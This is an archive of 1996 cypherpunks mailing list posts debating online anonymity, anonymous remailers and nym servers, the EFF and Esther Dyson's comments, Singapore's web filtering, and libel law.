At 08:39 PM 9/2/96 -0800, Jim Bell (who else:-) wrote:
>At the risk of sounding like a broken record (a phrase that will get ever 
>more obscure now that we're in the CD era...) that's why I pushing AP 
>(Assassination Politics.)  

In case anybody wonders why there _are_ relatively reasonable people like
Esther Dyson who aren't happy with anonymity in spite of not liking
the alternative of government control, this sort of thing _is_ one
of the reasons :-)   

You CAN freak ALL the mundanes all the time, but it's not necessarily
a good idea.....

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Tue, 3 Sep 1996 03:00:17 +0800
To: cypherpunks@toad.com
Subject: Re: Free Speech and List Topics
In-Reply-To: <199609020517.WAA06504@netcom.netcom.com>
Message-ID: <199609021414.CAA29655@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


qut@netcom.com (Dave Harman OBC) wrote:

   How about supporting the effort for comp.cypherpunks ?

God forbid.  Isn't there enough off-topic noise on the list for you?
I'd be glad to email you a bunch of "MAKE MONEY FA$T" and "Want XXX
pictures in your mailbox?" messages every day, if not.

   About the need for limits for anonymity, guess what brought that on?
   Crime?  Yes!  The crime of the media monopoly violating the anti-trust
   acts, because people are ignorant enough to trust the mass media for
   their news.

huh?

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
Without freedom of choice there is no creativity.
		-- Kirk, "The return of the Archons", stardate 3157.4




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 3 Sep 1996 20:52:55 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: What is the EFF doing exactly?
Message-ID: <199609030930.CAA21885@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:54 PM 9/2/96 -0700, someone purporting to be
"Vladimir Z. Nuri" <vznuri@netcom.com> wrote:

[EFF / Unicorn rant, deleted. ]

>I also don't understand the anonymity fight by cpunks. it's the
>wrong battle imho. ask any remailer operators how their services
>are panning out. they will complain of the incessant spam and
>increasing litigious pressure. I don't see any technological 
>solutions to these problems. if there were, they'd have been 
>invented now. 

As a former remailer operator who quit because of spam,
and may restart when I can hack together a spam-reducing remailer,
let me comment on this.  We're only beginning to understand the 
technical questions for the parts of the problem that technology can do.
One problem is that the technical definition of spam is
"I'll know it when I see it", which is hard to write code for.
And the definition of "offensive" is "one or more letters together,
viewed by the appropriate reader", and remailers are good at finding
that sort of reader.  A lot of it is social, not technical.
But improving blocking capabilities and news-cancel capabilities helps.

And some problems are just _hard_ technically.  Take 2-way remailers -
encrypted reply blocks aren't perfect, because the system that
handles them can decrypt them.  Nymservers that depend on a different
system supporting encrypted reply blocks help, because it forces
Bad Guys to subvert two systems to identify the recipient,
and you can chain that sort of thing to make it harder.
But it's still tough, and that problem is fairly well-defined.
Getting rid of vaguely-defined things is tougher.

Mike Godwin has suggested that some of the major problems on the net
are the results of "cheap speech".  It's easy to send insults and
hate email to people, nearly anonymously, nearly free, when only a few
hostile people would bother doing it with paper mail, and most newspapers
wouldn't print it.  The News Media Establishment is threatened because
anybody can broadcast anything they want to millions of people without
spending millions of dollars for an artificially scarce TV channel
that requires government permission to broadcast on.  Readers are
swamped because 25 million Internet users sending one line of text per day
make 2 GB of Usenet/Web/Email, which is three or four orders of magnitude
beyond what most people can actually read.  Scale is tough,
and problems that are half-solvable at one scale may be insolvable
at the next order of magnitude.

Anonymous remailers support several things I want to do,
and that I want other people be able to do:
1) Let people have private conversations without being identified
by third parties.
2) Let people have private conversations without being identified
by each other, voluntarily and respecting each others' rights.
3) Let people broadcast things to the public that they might
be afraid to do otherwise.
4) Let people broadcast things to the public without their
reputations, good or bad, affecting readers' reactions.
5) Let people experiment with different personality and
conversation styles, though this doesn't strictly require anonymity.
6) Let people communicate with government officials without risk.

Not all of these things are always good; people can abuse them if
they want, and one reason for experimenting with different kinds of
remailers is to try to balance the good and bad that comes from
facilitating those conversations.  Technical capabilities of the
remailer will affect how people use it; two-way-ness is a big win.
I blocked president@whitehouse.gov on my remailer real early, 
though that's mainly because the government has this silly law
against threatening the President.

>let's face it, anonymity is a pain in the ass to support. 
>maybe there are other goals that are more crucial
>that lie at the heart of anonymity. what cpunks are really
>seaking is  "assurance of freedom from retribution". when the
>problem is phrased more openly like that, other solutions become
>possible and worth consideration. 

An interesting formulation.  While there are more issues than
just preventing retribution, theft, and prejudice, that would be a good start.
Unfortunately, the two approaches I can see to achieving it are
1) Have a perfect world with perfect people in it and
        perfect people running human-rights-respecting governments
2) Don't let them know your name.

While there are groups that are working on bringing us closer to 1),
or at least as far as "1a) Have a semi-tolerable world where the
government doesn't harass you very much for what you say and
doesn't single you out as a source of funds for their great plans",
those folks have a long row to hoe.  We can do something about 2).
I'm happy to work on 1a) with people, though I won't see it in
my lifetime, but you and I can work on 2) today, and accomplish something.

                                

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 3 Sep 1996 18:55:53 +0800
To: cypherpunks@toad.com
Subject: Re: "Security risks" vs. "credit risks"
Message-ID: <9609030808.AB20606@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 31 Aug 96 at 20:53, Igor Chudov @ home wrote:

> Airlines, for example, are under tight and rather
> arbitrary control of the FAA.

Most CPunks have no idea how true this is.  Try reading about the Bob 
Hoover case if you want to learn about FAA's finest actions...

jfa




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 3 Sep 1996 19:42:45 +0800
To: James Seng <cypherpunks@toad.com
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
Message-ID: <9609030809.AB20606@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On  2 Sep 96 at 11:46, Enzo Michelangeli wrote:

> On Sun, 1 Sep 1996 ichudov@algebra.com wrote:
 
> > James Seng wrote:
> > > To understand the sitution better, you should not impose America
> > > idealogy and perspection on how things to be done to Singapore.
> > > Singapore maybe young but there are certain culture too.

I agree with that.  I should therefore cease, as much as possible,
to interact with them by stopping to buy anything made in Singapore.  
Then, let them starve, fed by their highers cultural ideas.

> > > Most importantly, the move to censor certain WWW site actually
> > > comes as a relieve to many people, especially parents who
> > > worried about the bad influence of it. We can go into the same
> > > discussion about whose responsibilty it is but before you do
> > > that, please bear in mind that this is Singapore.

At whose moral expanse?


> Of course, one may argue that the racial, social and religious
> relations are better handled the American way. That, however, is a
> controversial issue, and adopting confrontational cowboy attitudes
> is not going to make the social evolution any faster. 

Who talks of social evolution?  We only talk about civil liberties.  
And they are damn easy to implement: Leave your neighbor do what he 
pleases.  Mind your own business.

> IMHO, the present measures represent more a gesture of appeasement
> to concerned social conservatives, not differently from the CDA in
> the US, than an attempt to control the flow of information.

This whole paragraph is a fine example of appeasement.  And the CDA 
*is* an attempt to control the flow, not of information, but of 
ideas.

jfa
 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants: physicists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <MAILER-DAEMON@mqg-smtp3.usmc.mil>
Date: Tue, 3 Sep 1996 19:10:19 +0800
To: <cypherpunks@toad.com>
Subject: Undeliverable Message
Message-ID: <vines.Afe5+qiy8mB@mstrinet.usmc.mil>
MIME-Version: 1.0
Content-Type: text/plain


To:            <cypherpunks@toad.com>
Cc:            
Subject:       Re: Cypherpunk Mailboxes?

Message not delivered to recipients below.  Press F1 for help with VNM
error codes.               

	VNM3043:  BANYAN SERVER@MAG26@2DMAW NEW RIVER


VNM3043 -- MAILBOX IS FULL

   The message cannot be delivered because the
   recipient's mailbox contains the maximum number of 
   messages, as set by the system administrator.  The
   recipient must delete some messages before any
   other messages can be delivered.
    The maximum message limit for a user's mailbox is 
   10,000.  The default message limit is 1000 messages.  
   Administrators can set message limits using the 
   Mailbox  Settings function available in the 
   Manage User menu  (MUSER). 

   When a user's mailbox reaches the limit, the 
   user must delete some of the messages before 
   the mailbox can accept any more incoming messages.

UNDEFINED-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 2 Sep 1996, The Deviant wrote:

> Hrmm.. perhaps there's a better way...
> such as having the user and the mail server negoiae a key (i don't really
> know the details of diffie-hellman or he like, so tell me if this isn't
> feasable), and have the encryption/decypion routines strip addresses,
> so that the person is only identifiable by their key...

The mail server still has to send packets to the user.  A packet sniffer might
not be able to find out the actual contents of the transmission, but it would
be able to find out the host that has made the connection.  If this is combined
with the knowledge of the times that certain user's mailboxes get cleared out,
it would be possible to find out which nyms belong to which people.  The
current nym servers that automatically forward mail do not have this problem.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMituHCzIPc7jvyFpAQFXSQf9FS30slaO7LDllILC+eEdk/7aBAy312MY
esRgbc2EUI7W1WBsujrCznLrbzki0MZ58djDxAmIlz2+YzmQFAMpCx1YGaEkTLIt
o4//O6KnAkXde1no+WJXuNry3gzXUDgrUG3S8s3HCDsPfmu1x25J/M8nrL9ijx42
Jd2q9Z/wdAZxIFuUUoZotbUDIwXkHk17l+rNVUL5Pt4ukVd2M85wDp6EpWRCWsQP
Xjgwp8FdYd8m/tqxjIygyog5tfsV3qD4ve8Wl7E0MaWkqPyvzb843G0VXSKfI0iH
fE1WaHmqvF+VwPU/I2BXnjMjWK4xOW/pKk3llQFSEj8frFGjtqn1ag==
=3Phf
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.net (Ulf Moeller)
Date: Tue, 3 Sep 1996 12:43:34 +0800
To: spg@dds.nl
Subject: Re: FWD: Another try to kill democracy
In-Reply-To: <322B5766.60F8C2BB@dds.nl>
Message-ID: <m0uxlEc-00002eC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


>I just got wind that the German government is planning to force german
>ISP's
>to shut off access to my ISP, XS4ALL, because the german magazine
>'Radikal'
>has a web page on xs4all.

That would be which government agency?

>http://www.xs4all.nl/~tank/radikal/index.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Tue, 3 Sep 1996 23:45:48 +0800
To: Black Unicorn <vznuri@netcom.com>
Subject: Re: What is the EFF doing exactly?
Message-ID: <2.2.32.19960903115249.006e7bfc@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:40 PM 9/2/96 -0400, Black Unicorn wrote:
>> what *constructive* 
>> alternative to EFF do you propose? if you have none, please shut up.
>
>I think any organization that would apply political pressure rather than
>bow to it would be an alternative.  I think an organization in touch
>enough with its own policy to prevent its staff and board from making
>embarassing big brother type proposals to curtail the ability of any of us
>to post without attributation would be an alternative.  I think an
>organization without the internal conflict and strife that has clearly
>marred EFF in past and made it a laughable attempt at cohesive political
>persuasion would be an alternative.  I think an organization that had
>official policies on the core issues which it proposes to influence would
>be an alternative.
>
>In short, an organization that had even one of the needed elements of
>legislative influence.  (Cohesive, directed, persistent, and
>uncompromising).

"Uncompromising" is not an "element of legislative influence," at least not
on this planet.

--
Jon Lebkowsky <jonl@hotwired.com>  FAX (512)444-2693  http://www.well.com/~jonl
Electronic Frontiers Forum, 6PM PDT Thursdays     <http://www.hotwired.com/eff>
"No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Wed, 4 Sep 1996 00:05:00 +0800
To: cypherpunks@toad.com
Subject: Voting Monarchist?
Message-ID: <9609031057.AA17091@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


unicorn@schloss.li wrote:

<snip>

>I hate lightning

it's pretty, but it can be nasty.
most pretty things can.

> Vote Monarchist

who is the candidate? LaRouche?















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Wed, 4 Sep 1996 00:41:36 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: POT_hot
Message-ID: <2.2.32.19960903115927.006b2548@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 PM 9/2/96 -0800, jim bell wrote:

>At 11:39 PM 9/2/96 GMT, John Young wrote:
>>   Foreign Affairs, Sep/Oct, Lead Essay: 
>> 
>>   "Postmodern Terrorism. The terrorism of the future may be 
>>   far more destructive than terrorism as we have known it." 
>>    
>>   An informative survey and pot-heat by Walter Laqueur. 
>> 
>>      Terrorism's prospects, often overrated by the media, 
>>      the public, and some politicians, are improving as its 
>>      destructive potential increases. Terrorism has 
>>      replaced wars between nations of the 1800s and 1900s. 
>[deleted]
>>      Why assassinate a politician or indiscriminately kill 
>>      people when an attack on electronic switching will 
>>      produce far more dramatic and lasting results? If the 
>>      new terrorism directs its energies toward information 
>>      warfare, its destructive power will be exponentially 
>>      greater than any it wielded in the past -- greater 
>>      even than it would be with biological and chemical 
>>      weapons. The single successful one could claim many 
>>      more victims, do more material damage, and unleash far 
>>      greater panic than anything the world has yet 
>>      experienced. 
>>   http://jya.com/pothot.txt  (30 kb) 
>
>
><sigh>
>Am I being unreasonable to expect at least a certain degreee of logic in the 
>world?    Why is it that this guy (Laqueur) seems to believe that the future 
>is filled with "greater panic than anything the world has yet experienced."  
>I believe that, while there may be panic, it'll be panic on the part of the 
>politicians, not ordinary citizens.  I suppose a certain amount of bias is 
>to be expected, seeing as how it's Foreign Affairs magazine.

A good representation of postmodern paranoia...the ingredients: a mind
somewhat boggled by the extent of change (and the extent of awareness of
change) occasioned by the 'information revolution,' a growing awareness of
the fragile interdependence of control systems, and (this is the clincher)
an inability to trust the intentions of the vast conspiratorial World Outside.

--
Jon Lebkowsky <jonl@hotwired.com>  FAX (512)444-2693  http://www.well.com/~jonl
Electronic Frontiers Forum, 6PM PDT Thursdays     <http://www.hotwired.com/eff>
"No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 4 Sep 1996 13:52:22 +0800
To: Jon Lebkowsky <stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: What is the EFF doing exactly?
Message-ID: <199609040334.UAA19232@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote:
> Not necessarily. The character of the anonymous speech is decisive. If you
> use anonymity to cloak harassment, for instance, the anonymity (which
> removes accountability) is a problem.  The accountability issue is real and
> should be addressed, not evaded.

No:  The harassment is the problem, not the anonymity that makes it
possible.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Tue, 3 Sep 1996 12:39:09 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <2.2.32.19960902124403.00ae6430@panix.com>
Message-ID: <Pine.WNT.3.94.960903074503.-463081B-100000@enzohome.ima.com>
MIME-Version: 1.0
Content-Type: text/plain


I agree with what you say, and that's exactly why all this thread is out
of focus. Blocking anything on the net is impossible, we know it and, I'm
sure, the Singapore government knows it as well. The filtering proxies
they deployed, however, allow them to show that they are "doing something" 
and get continued support from the socially conservative constituency; the
net will route around, and life will go on.  If the purpose of those
measures had been political censorship, the SG government would have
banned crypto or simply restricted Internet access, as they have done with
mass media like satellite TV. Hovever, they on one hand know that Internet
is strategic to the country's future development, and on the other hand
that its use is limited to a well-educated elite not likely to fall prey
of simplistic propaganda as tabloid readers would be, and that would be
able to find sources of free information anyway: hence, the green light.

Let's not fool ourselves: social mores are determined by economic
development, which in turn is driven by technology and free markets.
Political activism may sometimes help, but it's largely overrated (and in
some cases it may backfire). When a government pursues free market and
technological advancement, time is on freedom's side.

Enzo


On Mon, 2 Sep 1996, Duncan Frissell wrote:

> At 07:06 AM 9/2/96 +0800, James Seng wrote:
> >that). I have a long argument with this person, telling him that despite
> >what they have done, i could still access to those stuff which they ban.
> >his reasoning is "how many people can do it? 10%? 5%? That's fine with us.
> >If the people really wans it, they can get it". 
> 
> The flaw with this view is that it is no harder to deploy software that
> defeats Singapore's proxy than it is to establish a tcp/ip connection in the
> first place.  For civilians (such as myself) establishing a tcp/ip
> connection is as hard or as easy as establishing an encrypted tcp/ip tunnel
> to defeat government control efforts.  For both these tasks, I am dependent
> on software writers who know more than I do.  Since the software of the Net
> is written by people not governments, the governments will find it hard to
> hold "free users" down to a 5% or 10% figure.  The Net is nothing more than
> the software that it runs on and we (not governments) write the software.
> 
> In addition, we are not imposing our ideology on Singapore.  If Singapore
> changes, it will be because an encounter with the realities of the free flow
> of information changes it.
> 
> DCF
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 4 Sep 1996 01:51:45 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi (fwd)
Message-ID: <Pine.SUN.3.95.960903092330.22903B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mike Godwin on E.Dyson:
[please note that I'm just a conduit here; direct replies accordingly]

---------- Forwarded message ----------
Date: Tue, 3 Sep 1996 02:17:12 -0700
>From: Mike Godwin <mnemonic@well.com>
To: Michael Froomkin <froomkin@law.miami.edu>,
    Mike Godwin <mnemonic@well.com>
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi (fwd)


Esther had written:

>Now, speaking personally: I believe there are trade-offs -- which is what I
>told the LA Times.  I assume I was quoted accurately (although the word
>"enforce" is awkward), but out of context.   Anonymity can be dangerous --
>as can traceability, especially in/by repressive regimes.  Therefore I would
>favor allowing anonymity -- with some form of traceability only under terms
>considerably stronger than what are generally required for a wiretap.
>Anyone who seriously needs anonymity because of a repressive government is
>likely to use a foreign (outside whatever jurisdiction he fears) server, so
>that this is not a matter of "local" laws.  The tracer would have to pass
>through what I hope would be tighter hoops than we have now.


This is surely a reasonable statement for Esther to have made, even though
connotatively it may seem to have an anti-anonymity thrust to it. Who can
dispute that individual freedom (of any sort) entails the potential that
someone will use that freedom badly, and that the greater the freedom the
greater the theoretical potential for harm?

The civil-libertarian argument can't be any naive denial of this sort of
analysis -- instead, it has to something that acknowledges the truth of the
principle, yet simultaneously denies the inference that the principle,
standing alone, amounts to a case for limiting that freedom. One way to do
so is to argue  that the theoretical threat is outweighed by the benefits
both to society and to individuals. Another is to point out that there
seems to be no evidence that the theoretical problem has transmuted itself
into a real one.

You may feel free to forward this.


--Mike





-------------------------------------------------------------------------------
Law Professor Volokh Errs In Slate Article About Communications Decency Act.
    Set your browser to the following URL to read a critique of the
    Slate article by EFF's Mike Godwin and MIT's Hal Abelson:
<http://swissnet.ai.mit.edu/~hal/volokh-slate-critique-by-godwin-abelson.html>.

      Mike Godwin, EFF Staff Counsel, can be reached at mnemonic@eff.org
                   or at his office, 510-548-3290.
---------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 4 Sep 1996 05:23:17 +0800
To: Chuck Thompson <chuck@nova-net.net>
Subject: Re: The Esther Dyson Flap
Message-ID: <ae51ade8030210047833@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:40 PM 9/3/96, Chuck Thompson wrote:

>"as a citizen"  You seem to be qualifying your statement.  Do you mean that
>she should have her right to free speech taken or stifled as chairwoman?  At

No. I said nothing of the kind. When people speak of "don't you believe in
her right to free speech?," I try to point out that this such a "right of
free speech" is not the issue at hand.


>the very least, it appears that several are demanding that she espouse a
>particular point of view because she is the chairwoman of an organization
>which, on the whole, is assumed to have a different viewpoint.  It seems to

No, I said nothing like this. She is obviously free to speak anything she
wishes, as a citizen or as head of an organization. It is up to members
(actually: _Board_ members, as EFF is not a grassroots, member-voting
organization) to decide if her support for restricting anonymous speech is
consistent with EFF directions.

However, as I said, if the top spokesman at EFF gives indication of having
views pretty much 180 degrees out of phase with our views, it's likely
we'll speak up and oppose her (or him), and perhaps even suggest that other
EFF board members look into the matter. "Free speech" is not even an issue.

>>Well, many of us did not pounce. Speaking for myself, I strongly suspected
>>that the newspaper article had summarized a more-nuanced point and had
>>effectively taken just a convenient sound bite.
>
>And you are to be commended for not doing so.  In fact, your response to my
>message is exactly what I would expect.. a well-put statement of a contrary
>opinion.

Thanks.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Wed, 4 Sep 1996 05:01:34 +0800
To: cypherpunks@toad.com
Subject: Re: Free Speech and List Topics
Message-ID: <199609031644.JAA08677@fat.doobie.com>
MIME-Version: 1.0
Content-Type: text/plain


qut@netcom.com (Dave Harman OBC) penned:

>! At 5:17 AM 9/2/96, qut wrote:
>No doubt the media is colluding for criminal purposes and
>shady outfits like The New York Times should be seized and analysed
>by Department Of Justice anti-trust invesigators.

I never thought I'd say this, so I'm saying it through a remailer :) but
please, skippy, don't vote Libertarian!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 4 Sep 1996 05:15:52 +0800
To: Hans "Unicorn" Van de Looy <hvdl@sequent.com>
Subject: Re: Passive Trojan (was:Re: HAZ-MAT virus)
Message-ID: <ae51b3f204021004e39e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:38 AM 9/3/96, Hans "Unicorn" Van de Looy, aka "Deep Throat,"  wrote:
>::
>Request-Remailing-To: remailer@huge.cajones.com
....
>::
>Request-Remailing-To: remailer@remailer.nl.com
....
>::
>Request-Remailing-To: furballs@netcom.com (Paul S. Penrod)
>


>Deep Throat.


Hey, Hans, ya gotta watch those "Cc: cypherpunks@toad.com" lines!

At least now we know who the _other_ "Unicorn" is.

How's Sequent doing? Is Casey Powell still there?


--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 4 Sep 1996 05:48:34 +0800
To: cypherpunks@toad.com
Subject: Re: The Esther Dyson Flap
Message-ID: <199609031719.KAA03089@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:11 PM 9/2/96 -0700, Timothy C. May wrote:
>Esther Dyson says that anonymity on the Net can do more damage than
>anonymity in other forums, and thus may need to be regulated and restricted
>in various ways. I disagree, as "the Net of a Million Lies" (to use Vinge's
>term) has grown up with anonymity, and few people take the anonymous (or
>not) rants and charges made in the millions per day with the same degree of
>certainty they take print comments. Put another way, there is no clear and
>present danger.

Indeed, I support the elimination of concepts such as "slander" and "libel" 
precisely because they cause more harm than good.  Currently, there is an 
illusion among ordinary citizens that "if that was untrue, you could sue him 
for libel!" despite the fact that this is rarely practical.  In that way, 
the law actually adds credibility to what should be an incredible claim.  
Eliminate libel suits, and you've eliminated any presumption that because 
it's been spoken or is in print, it's likely to be correct.




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 4 Sep 1996 06:09:29 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <Pine.SUN.3.94.960902190237.3068B-100000@polaris>
Message-ID: <199609031730.KAA20063@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>I would put forth that you know nothing of my efforts, and therefore are
>in no position to judge me.  I would also put forth that the efforts of
>EFF, or lack thereof, are quite public.

that's my point. an entity that is willing to put its
reputation on the line is inherently more valuable than one that
is not, imho. all the EFF members have good public track records.
what EFF has accomplished is checkered, like any battle-scarred
infrantry will experience. if you expect unadulterated success,
you're not living in the same reality everyone else around here
is.

granted, EFF has made some serious compromises in their agenda.
they're finding their identity. but it doesn't help to have people
rant at them and ignore their notable successes, and tend to criticize
them merely because they're a public target.

whenever you criticize something, please keep in mind the basic
qualification: what is a better alternative? sure, EFF hasn't had
stellar success, but then, who has in the agenda they are pursuing?
their goals are extremely ambitious and difficult in the current
climate. lack of success is proof of the difficulty, not of any
incompetence, as I wrote. when you begin to understand this, you
won't alienate those you are critical of. EFF members are *tremendously*
open to positive comments. instead you harangue them and lose their
good will to the point that they may tend to ignore cpunk comments
entirely because of your very poor example.

>I think any organization that would apply political pressure rather than
>bow to it would be an alternative.  I think an organization in touch
>enough with its own policy to prevent its staff and board from making
>embarassing big brother type proposals to curtail the ability of any of us
>to post without attributation would be an alternative.  I think an
>organization without the internal conflict and strife that has clearly
>marred EFF in past and made it a laughable attempt at cohesive political
>persuasion would be an alternative.  I think an organization that had
>official policies on the core issues which it proposes to influence would
>be an alternative.

why don't you start one then? what you seem to fail to adequately
understand is that there is virtually no organization in the world
that is free from the difficulties you describe. whenever you have
multiple people working together, you aren't going to have clear-cut
successes. cpunks are always yelling at anything resembling organization,
which really annoys me. EFF has had tremendous powerful successes in
areas you are conveniently overlooking, in areas that are hard
to measure, such as increasing public awareness. can you make a good
case that EFF has had no positive effect? we may be living in a much
darker reality without them.

>In short, an organization that had even one of the needed elements of
>legislative influence.  (Cohesive, directed, persistent, and
>uncompromising).

our congress does not have this property after centuries of trying.
why should a private organization totally transcend it? face it,
getting things done in this world can be awfully tricky at times.
you make it sound like attacking Clipper or stopping any of the
legislation that has made its way into congress is a trivial 
endeavor. go ahead, please create a counterexample.

> What is so shocking about announcing that a
>given organization does not support my interests and therefore calling on
>others who share my interests not to make financial donations to said
>organization? 

you can criticize an organization without implying the people who contribute
to it are incompetent, a distinction that has subtly eluded you so far.

> Is there something EFF fears in free speech and political
>consensus building?  Perhaps if they had a straightforward policy....

no matter what they decide, they will be flamed by someone such as
yourself. they do have an agenda.

>Phrased another way, who cares what you are tired of hearing?

the EFF ranting is periodic, and your own sour comments are 
a repeated feature of this list. who *are* you? why are you so
critical of everything in existence? based on previous rants,
you're a habitual sourpuss.

>No, but when an organization espouses nothing on a given subject key to
>its mission, what does that say?  What about when its members espouse
>entirely different and even counter productive beliefs? 

again, you are presuming that anonymity is key to their mission.
that's a big leap of faith. there is room for honest disagreement.
you haven't heard of their agenda personally, so you are assuming 
there is none. from what I have seen, there is a reasonably 
cohesive agenda going on, and I'm not, like yourself, assuming
that it doesn't exist merely because I haven't seen it blared in
a noisy advertisement somewhere.

I agree with some of the EFF member's comments: anonymity could
be a very serious quagmire to support. there are probably better
trees to bark up.

>I thought its point was to protect cyberspace? 

of course, the interpretation of what is a threat is subjective.

>There aren't many battles to choose.  Let's seem some action. 

EFF has lobbied against many of the bills you mention. again, I think
you're being unfair in assuming merely because you haven't heard
of them accomplishing anything, they haven't.

>I do infact feel the cpunks have a greater track record than EFF.  Tell
>me, what has EFF done?  The list of "cypherpunk" accomplishments in terms
>of making the net a better place to be is, in my view, significant.
>Certainly the discussion here is livelier than anything I've seen from
>EFF.

ah, the fundamental illusion that is going on here. discussion alone
is WORTHLESS in changing the world. yet we have REAMS of it on the
cpunk list. I'd say EFF has *acted* and put enormous effort into
its agenda. but it is invisible because its not easily quantified.
ask them how many pamphlets they have printed for the public, how
much mail they have sent out to members informing them of
developments, etc.  consider the high-quality EFF newsletter. 
is there anything like that in the cpunk area? frankly I think your
comparing cpunks to EFF is really laughable. they are not even in
the same ballpark. it only shows how warped your concept is of what
an "accomplishment" is.

>You reveal here the basic character of your objection.  You don't like
>the fact that I criticized EFF. 

no, as I stated, criticism is great, but yours is written in such a
way as to imply your target is incompetent. your tone has changed
significantly in your letter now that I have challenged you on it.

>Well what, EFF, have you done for us LATELY?

EFF hasn't done much for anyone who hasn't paid their dues..

>English is not my first language.  Start paying my hourly rate to type in
